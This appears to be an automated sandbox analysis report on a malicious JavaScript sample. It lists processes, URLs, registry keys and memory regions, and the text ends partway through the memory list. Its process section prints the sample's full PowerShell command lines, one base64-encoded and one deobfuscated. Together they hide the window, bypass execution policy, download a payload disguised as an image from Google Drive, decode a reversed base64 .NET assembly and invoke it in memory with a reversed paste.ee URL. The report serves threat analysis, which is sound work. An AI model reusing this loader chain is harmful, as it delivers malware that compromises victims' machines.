Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
ciuNW.js
|
Unicode text, UTF-8 text, with very long lines (560), with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csghtoxn.pz0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddhq1wuc.4nb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgre2jf3.srw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_soohqr0e.ujc.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ciuNW.js"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAJwArACcAaABCAFkAdwB1AHIAIABaADQAUwA7AFQAMgBIAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgACcAKwAnAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQAnACsAJwBuAHQAOwBUADIASABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAMgAnACsAJwBIAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUADIASABpAG0AYQBnAGUAVQByAGwAKQA7AFQAMgBIAGkAbQBhACcAKwAnAGcAZQBUAGUAeAAnACsAJwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAFQAMgBIAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAMgBIAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAFMAJwArACcAVABBAFIAVAA+AD4AWgA0AFMAOwAnACsAJwBUADIASABlAG4AZABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBaACcAKwAnADQAJwArACcAUwA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVAAyAEgAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVAAyAEgAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAMgBIAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABUADIASABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkACcAKwAnAGUAeABPAGYAKABUADIASABlAG4AZABGAGwAYQBnACkAOwBUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFQAMgBIAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVAAyAEgAcwB0AGEAcgB0AEkAbgBkACcAKwAnAGUAeAA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAnACsAJwBUADIASABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVAAyAEgAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACcAKwAnACAAVAAyAEgAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAOwBUADIASABiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFQAMgBIAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACwAIABUADIASABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVAAyAEgAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABWAEcAcQAgAEYAbwAnACsAJwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABUADIASABfACAAfQApAFsALQAnACsAJwAxACcAKwAnAC4ALgAtACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFQAMgBIAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAJwArACcAaQBuAGcAKABUADIASABiAGEAcwBlADYANABSAGUAdgBlACcAKwAnAHIAcwBlAGQAKQA7AFQAMgBIAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAJwArACcAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAVAAyAEgAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AFQAMgBIAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACsAJwBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABaADQAUwBWAEEASQBaADQAUwApADsAVAAyAEgAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgAnACsAJwBvAGsAZQAoAFQAMgBIAG4AdQBsAGwALAAgAEAAKABaADQAUwAwAC8ANABLAHoAJwArACcAegB1AC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAWgA0AFMAJwArACcALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBaADQAJwArACcAUwAsACAAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAbwBaADQAUwAsACAAWgA0AFMAZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBaADQAUwAnACsAJwAsAFoANABTAGQAJwArACcAZQAnACsAJwBzAGEAdABpAHYAYQAnACsAJwBkAG8AWgA0AFMALABaADQAJwArACcAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALABaADQAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAMQBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMAKQApADsAJwApACAALQBDAHIAZQBQAGwAYQBDAEUAIAAgACcAVAAyAEgAJwAsAFsAQwBoAGEAUgBdADMANgAtAFIAZQBQAGwAQQBjAEUAIAAgACcAWgA0AFMAJwAsAFsAQwBoAGEAUgBdADMAOQAgAC0AQwByAGUAUABsAGEAQwBFACcAVgBHAHEAJwAsAFsAQwBoAGEAUgBdADEAMgA0ACkAKQA=';$OWjuxD
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden
-executionpolicy bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"IEX( (('T2HimageUrl = Z4Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur Z4S;T2HwebClient
= '+'New-Object System.Net.WebClie'+'nt;T2HimageBytes = T2'+'HwebClient.DownloadData(T2HimageUrl);T2Hima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetSt'+'ring(T2HimageBytes);T2HstartFlag
= Z4S<<BASE64_S'+'TART>>Z4S;'+'T2HendFlag = Z4S<<BASE64_END>>Z'+'4'+'S;T2HstartIndex = T2HimageText.IndexOf(T2HstartFlag);T2HendInd'+'ex
= T2HimageText.Ind'+'exOf(T2HendFlag);T2HstartIndex -'+'ge 0 -and T2HendIndex -gt T2HstartInd'+'ex;T2HstartIndex += '+'T2HstartFlag.Length;T2Hbase64Length
='+' T2HendIndex - T2HstartIndex;T2Hbas'+'e64Command = T2HimageText.Substring(T2HstartIndex, T2Hbase64Length);T2Hbase64Reversed
= -join (T2Hbase64Command.'+'ToCharArray() VGq Fo'+'rEach-Object { T2H_ })[-'+'1'+'..-(T2Hbase64Command.Length)];T2HcommandBytes
= [System'+'.Convert]::FromBase64Str'+'ing(T2Hbase64Reve'+'rsed);T2HloadedAssembly = [System.Reflection.Asse'+'mbly]::Load(T2HcommandBytes);T2HvaiMethod
= [dnlib.IO.Home'+'].GetMethod(Z4SVAIZ4S);T2HvaiMethod.Inv'+'oke(T2Hnull, @(Z4S0/4Kz'+'zu/d/ee.etsap//:sptthZ4S'+', Z4SdesativadoZ4S,
Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SAddInProcess32Z4'+'S, Z4SdesativadoZ4S, Z4Sdesat'+'ivadoZ4S'+',Z4Sd'+'e'+'sativa'+'doZ4S,Z4'+'SdesativadoZ4S,Z4Sdesativad'+'oZ4S,Z4SdesativadoZ4S,Z4SdesativadoZ4S,Z4S1Z4S,Z4SdesativadoZ4S));')
-CrePlaCE 'T2H',[ChaR]36-RePlAcE 'Z4S',[ChaR]39 -CrePlaCE'VGq',[ChaR]124))"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://drive.google.com
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://drive.usercontent.google.com
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
https://aka.ms/pscore6
|
unknown
|
||
http://drive.google.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 6 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
172.217.16.206
|
||
drive.usercontent.google.com
|
142.250.185.97
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.217.16.206
|
drive.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
1CC3D9B4000
|
heap
|
page read and write
|
||
1CC3BB72000
|
heap
|
page read and write
|
||
224E58F0000
|
heap
|
page read and write
|
||
1CC3D96E000
|
heap
|
page read and write
|
||
1CC3D960000
|
heap
|
page read and write
|
||
1CC3BB84000
|
heap
|
page read and write
|
||
1CC3D8C4000
|
heap
|
page read and write
|
||
1CC3BB84000
|
heap
|
page read and write
|
||
1CC3D8CB000
|
heap
|
page read and write
|
||
1CC3DAB1000
|
heap
|
page read and write
|
||
1CC3D93B000
|
heap
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
1CC3D984000
|
heap
|
page read and write
|
||
179564F5000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D9E9000
|
heap
|
page read and write
|
||
1CC3D9D7000
|
heap
|
page read and write
|
||
1CC3D8C8000
|
heap
|
page read and write
|
||
468BFB8000
|
stack
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
17954B60000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
1CC3D8E4000
|
heap
|
page read and write
|
||
1CC3BB6A000
|
heap
|
page read and write
|
||
1CC3D9AC000
|
heap
|
page read and write
|
||
388A1FE000
|
stack
|
page read and write
|
||
1CC3D9DF000
|
heap
|
page read and write
|
||
17956961000
|
trusted library allocation
|
page read and write
|
||
1CC3D87F000
|
heap
|
page read and write
|
||
224CF508000
|
trusted library allocation
|
page read and write
|
||
1CC3D993000
|
heap
|
page read and write
|
||
1CC3D890000
|
heap
|
page read and write
|
||
92C2D7E000
|
stack
|
page read and write
|
||
1CC3D99C000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
1CC3D9C3000
|
heap
|
page read and write
|
||
1CC3D8B7000
|
heap
|
page read and write
|
||
1CC3B930000
|
heap
|
page read and write
|
||
1CC3D87B000
|
heap
|
page read and write
|
||
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D9B8000
|
heap
|
page read and write
|
||
179568DE000
|
heap
|
page read and write
|
||
1CC3D8DE000
|
heap
|
page read and write
|
||
1CC3D9BC000
|
heap
|
page read and write
|
||
1CC3BA90000
|
heap
|
page read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
17956D82000
|
trusted library allocation
|
page read and write
|
||
468BD7E000
|
stack
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
1CC3DA8D000
|
heap
|
page read and write
|
||
1CC3D9AB000
|
heap
|
page read and write
|
||
1CC3D941000
|
heap
|
page read and write
|
||
1CC3D876000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3BB79000
|
heap
|
page read and write
|
||
1CC3D996000
|
heap
|
page read and write
|
||
1CC3D9B1000
|
heap
|
page read and write
|
||
179549CB000
|
heap
|
page read and write
|
||
17956AC7000
|
trusted library allocation
|
page read and write
|
||
1CC3BB72000
|
heap
|
page read and write
|
||
1CC3D992000
|
heap
|
page read and write
|
||
224E5A12000
|
heap
|
page read and write
|
||
1796EC00000
|
heap
|
page execute and read and write
|
||
1CC3BABA000
|
heap
|
page read and write
|
||
1CC3BB74000
|
heap
|
page read and write
|
||
1CC3D966000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
1CC3D887000
|
heap
|
page read and write
|
||
1CC3D9AA000
|
heap
|
page read and write
|
||
1CC3D888000
|
heap
|
page read and write
|
||
1CC3D973000
|
heap
|
page read and write
|
||
1CC3BB79000
|
heap
|
page read and write
|
||
1CC3D876000
|
heap
|
page read and write
|
||
1CC3D8DE000
|
heap
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
1CC3D95A000
|
heap
|
page read and write
|
||
1796EC30000
|
heap
|
page read and write
|
||
17956D93000
|
trusted library allocation
|
page read and write
|
||
224E5A7B000
|
heap
|
page read and write
|
||
224CED4A000
|
trusted library allocation
|
page read and write
|
||
1CC3D8C4000
|
heap
|
page read and write
|
||
17956EE1000
|
trusted library allocation
|
page read and write
|
||
1CC3BB8C000
|
heap
|
page read and write
|
||
1CC3D960000
|
heap
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D9B1000
|
heap
|
page read and write
|
||
224E582C000
|
heap
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
1CC3BB58000
|
heap
|
page read and write
|
||
1CC3DAA0000
|
heap
|
page read and write
|
||
1CC3BC40000
|
heap
|
page read and write
|
||
1CC3BAFE000
|
heap
|
page read and write
|
||
224CB8C0000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3BB6F000
|
heap
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3DAA6000
|
heap
|
page read and write
|
||
1CC3D9A1000
|
heap
|
page read and write
|
||
1CC3BB82000
|
heap
|
page read and write
|
||
1CC3BA10000
|
heap
|
page read and write
|
||
388A3FE000
|
stack
|
page read and write
|
||
224E5877000
|
heap
|
page read and write
|
||
1CC3D8E4000
|
heap
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
224CB846000
|
heap
|
page read and write
|
||
17956380000
|
heap
|
page read and write
|
||
92C303E000
|
stack
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
224CED5B000
|
trusted library allocation
|
page read and write
|
||
1CC3D985000
|
heap
|
page read and write
|
||
1CC3BB84000
|
heap
|
page read and write
|
||
1CC3D966000
|
heap
|
page read and write
|
||
38899EA000
|
stack
|
page read and write
|
||
224CED75000
|
trusted library allocation
|
page read and write
|
||
92C2CFE000
|
stack
|
page read and write
|
||
1CC3BB62000
|
heap
|
page read and write
|
||
1CC3D99E000
|
heap
|
page read and write
|
||
224CD140000
|
trusted library allocation
|
page read and write
|
||
1795692E000
|
heap
|
page read and write
|
||
17954A58000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3BB8E000
|
heap
|
page read and write
|
||
1CC3D990000
|
heap
|
page read and write
|
||
224CB6D0000
|
heap
|
page read and write
|
||
1CC3D982000
|
heap
|
page read and write
|
||
1CC3BB74000
|
heap
|
page read and write
|
||
1CC3D893000
|
heap
|
page read and write
|
||
1CC3D99A000
|
heap
|
page read and write
|
||
388A2FF000
|
stack
|
page read and write
|
||
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
1CC3D990000
|
heap
|
page read and write
|
||
224CD186000
|
heap
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
1CC3D878000
|
heap
|
page read and write
|
||
224E5A45000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
1CC3BB7B000
|
heap
|
page read and write
|
||
1CC3DA8C000
|
heap
|
page read and write
|
||
1CC3D93F000
|
heap
|
page read and write
|
||
3889DFE000
|
stack
|
page read and write
|
||
468BA7E000
|
stack
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
1CC3D9E5000
|
heap
|
page read and write
|
||
17954B80000
|
heap
|
page read and write
|
||
1CC3BB82000
|
heap
|
page read and write
|
||
1CC3D9AB000
|
heap
|
page read and write
|
||
468C2BB000
|
stack
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
468B7C3000
|
stack
|
page read and write
|
||
1CC3D9AF000
|
heap
|
page read and write
|
||
1CC3DAB0000
|
heap
|
page read and write
|
||
224CD681000
|
trusted library allocation
|
page read and write
|
||
92C3C0E000
|
stack
|
page read and write
|
||
1CC3D89C000
|
heap
|
page read and write
|
||
1CC3D99F000
|
heap
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
1CC3D8AE000
|
heap
|
page read and write
|
||
17956A81000
|
trusted library allocation
|
page read and write
|
||
224CB7C9000
|
heap
|
page read and write
|
||
1CC3D9A0000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1CC3D960000
|
heap
|
page read and write
|
||
1CC3D9E5000
|
heap
|
page read and write
|
||
1CC3D88B000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
224CB8E0000
|
heap
|
page read and write
|
||
1CC3BAD2000
|
heap
|
page read and write
|
||
1CC3BB6C000
|
heap
|
page read and write
|
||
1CC3BB75000
|
heap
|
page read and write
|
||
1CC3D897000
|
heap
|
page read and write
|
||
1CC3D997000
|
heap
|
page read and write
|
||
1CC3D9C0000
|
heap
|
page read and write
|
||
1CC3D8E4000
|
heap
|
page read and write
|
||
1CC3D9DB000
|
heap
|
page read and write
|
||
1CC3D8BB000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
1CC3BB6F000
|
heap
|
page read and write
|
||
92C2FB8000
|
stack
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1CC3D986000
|
heap
|
page read and write
|
||
1CC3D9A7000
|
heap
|
page read and write
|
||
224CB80A000
|
heap
|
page read and write
|
||
224CB800000
|
heap
|
page read and write
|
||
1CC3D8E9000
|
heap
|
page read and write
|
||
1CC3D9A1000
|
heap
|
page read and write
|
||
1CC3D885000
|
heap
|
page read and write
|
||
468BE79000
|
stack
|
page read and write
|
||
224CD100000
|
trusted library allocation
|
page read and write
|
||
1795689A000
|
heap
|
page read and write
|
||
1CC3D957000
|
heap
|
page read and write
|
||
1CC3D9DC000
|
heap
|
page read and write
|
||
1CC3D8AF000
|
heap
|
page read and write
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
1CC3D948000
|
heap
|
page read and write
|
||
224E57E8000
|
heap
|
page read and write
|
||
1CC3D9A6000
|
heap
|
page read and write
|
||
1CC3D999000
|
heap
|
page read and write
|
||
1CC3D8AE000
|
heap
|
page read and write
|
||
224E58D0000
|
heap
|
page read and write
|
||
1CC3D948000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D957000
|
heap
|
page read and write
|
||
1CC3D8C8000
|
heap
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3DA8D000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
1CC3D892000
|
heap
|
page read and write
|
||
1CC3DA8C000
|
heap
|
page read and write
|
||
224E568D000
|
heap
|
page read and write
|
||
1CC3D9AA000
|
heap
|
page read and write
|
||
1CC3D8B3000
|
heap
|
page read and write
|
||
1CC3D941000
|
heap
|
page read and write
|
||
17956950000
|
heap
|
page read and write
|
||
1CC3D993000
|
heap
|
page read and write
|
||
224CD704000
|
trusted library allocation
|
page read and write
|
||
468C23E000
|
stack
|
page read and write
|
||
1CC3D89B000
|
heap
|
page read and write
|
||
1CC3D93F000
|
heap
|
page read and write
|
||
1CC3D98F000
|
heap
|
page read and write
|
||
468BC7D000
|
stack
|
page read and write
|
||
468BF37000
|
stack
|
page read and write
|
||
1CC3D8AF000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
1CC3D995000
|
heap
|
page read and write
|
||
1CC3D8D9000
|
heap
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
1CC3D8C8000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3D947000
|
heap
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
17956D5D000
|
trusted library allocation
|
page read and write
|
||
1CC3D9BA000
|
heap
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3DAA6000
|
heap
|
page read and write
|
||
17956843000
|
heap
|
page read and write
|
||
92C3C8C000
|
stack
|
page read and write
|
||
1CC3D8A7000
|
heap
|
page read and write
|
||
1CC3DA96000
|
heap
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
1CC3D8EC000
|
heap
|
page read and write
|
||
224CB89B000
|
heap
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
1CC3D9A1000
|
heap
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
1CC3BB75000
|
heap
|
page read and write
|
||
1CC3D8E4000
|
heap
|
page read and write
|
||
179669D5000
|
trusted library allocation
|
page read and write
|
||
1CC3D943000
|
heap
|
page read and write
|
||
1CC3D8EE000
|
heap
|
page read and write
|
||
1CC3D9DB000
|
heap
|
page read and write
|
||
224E5A5F000
|
heap
|
page read and write
|
||
1CC3BC99000
|
heap
|
page read and write
|
||
1CC3D99D000
|
heap
|
page read and write
|
||
1CC3DAA6000
|
heap
|
page read and write
|
||
1CC3D9B8000
|
heap
|
page read and write
|
||
1CC3D871000
|
heap
|
page read and write
|
||
224DD690000
|
trusted library allocation
|
page read and write
|
||
1CC3DA11000
|
heap
|
page read and write
|
||
1CC3D982000
|
heap
|
page read and write
|
||
17956898000
|
heap
|
page read and write
|
||
1CC3DA0E000
|
heap
|
page read and write
|
||
1CC3D96C000
|
heap
|
page read and write
|
||
1CC3D935000
|
heap
|
page read and write
|
||
1CC3D998000
|
heap
|
page read and write
|
||
1CC3D999000
|
heap
|
page read and write
|
||
224CD5F0000
|
heap
|
page execute and read and write
|
||
1CC3D993000
|
heap
|
page read and write
|
||
1CC3BB72000
|
heap
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
224CB8A6000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
1CC3D9E9000
|
heap
|
page read and write
|
||
17956922000
|
heap
|
page read and write
|
||
1CC3D984000
|
heap
|
page read and write
|
||
1CC3D9AD000
|
heap
|
page read and write
|
||
1CC3D959000
|
heap
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
1CC3BB6F000
|
heap
|
page read and write
|
||
1CC3D9AB000
|
heap
|
page read and write
|
||
1CC3D966000
|
heap
|
page read and write
|
||
1CC3D8CB000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
224E59D0000
|
heap
|
page read and write
|
||
1CC3D899000
|
heap
|
page read and write
|
||
1CC3DAB0000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
1CC3BB64000
|
heap
|
page read and write
|
||
1CC3D9DB000
|
heap
|
page read and write
|
||
1CC3BB86000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3D9EE000
|
heap
|
page read and write
|
||
92C30BE000
|
stack
|
page read and write
|
||
1CC3BB74000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1796ED10000
|
heap
|
page read and write
|
||
1CC3D8AC000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
92C2F38000
|
stack
|
page read and write
|
||
1CC3D9AB000
|
heap
|
page read and write
|
||
1CC3BAF4000
|
heap
|
page read and write
|
||
1CC3D984000
